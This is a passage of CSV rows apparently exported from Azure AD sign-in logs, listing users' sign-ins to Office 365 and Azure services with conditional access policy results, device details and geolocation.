0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c3a23e25-0820-4eee-81ce-29eb12801b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c3a23e25-0820-4eee-81ce-29eb12801b00,SigninLogs,Sucess,33.7984581,-84.38828278
+587,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:34.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4d26479f-300c-0000-5577-038e3f06f77f,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",88cadf22-86a5-4f87-805f-6b28b4ce1d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,88cadf22-86a5-4f87-805f-6b28b4ce1d00,SigninLogs,Sucess,33.45851135,-82.21336365
+588,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:01.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e288a2a3-2198-4d83-af1d-fa0d1ed5f04c,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 18:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",88cadf22-86a5-4f87-805f-6b2875d21d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,88cadf22-86a5-4f87-805f-6b2875d21d00,SigninLogs,Sucess,33.45851135,-82.21336365
+589,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:16.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,38e91d01-944a-48f2-9e3e-e1fb26207244,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",b820b578-3403-4df9-9305-b26761041d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,b820b578-3403-4df9-9305-b26761041d00,SigninLogs,Sucess,33.7984581,-84.38828278
+590,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:16.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b0455268-27d5-45ba-8a51-1b15f2a1b9ca,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",b820b578-3403-4df9-9305-b26776041d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,b820b578-3403-4df9-9305-b26776041d00,SigninLogs,Sucess,33.7984581,-84.38828278
+591,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:18.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,06fecd4b-c6cb-4ea3-b4c6-9743411dccaf,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",b820b578-3403-4df9-9305-b267ca041d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,b820b578-3403-4df9-9305-b267ca041d00,SigninLogs,Sucess,33.7984581,-84.38828278
+592,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:39.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,782596c9-de88-4339-bc09-891d630d0183,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c3a23e25-0820-4eee-81ce-29eb75861b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c3a23e25-0820-4eee-81ce-29eb75861b00,SigninLogs,Sucess,33.7984581,-84.38828278
+593,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:13.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0b94c998-5c08-46bf-a624-ec31a5001473,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure App Service Resource,5e1ba54d-4504-4799-9600-6d05e58f0682,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:37,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",d335f4d8-fda1-4a0a-8761-918ce8a80300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,d335f4d8-fda1-4a0a-8761-918ce8a80300,SigninLogs,Sucess,38.47222137,-77.41989899
+594,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:34.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4d26479f-300c-0000-5577-038e3f06f77f,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 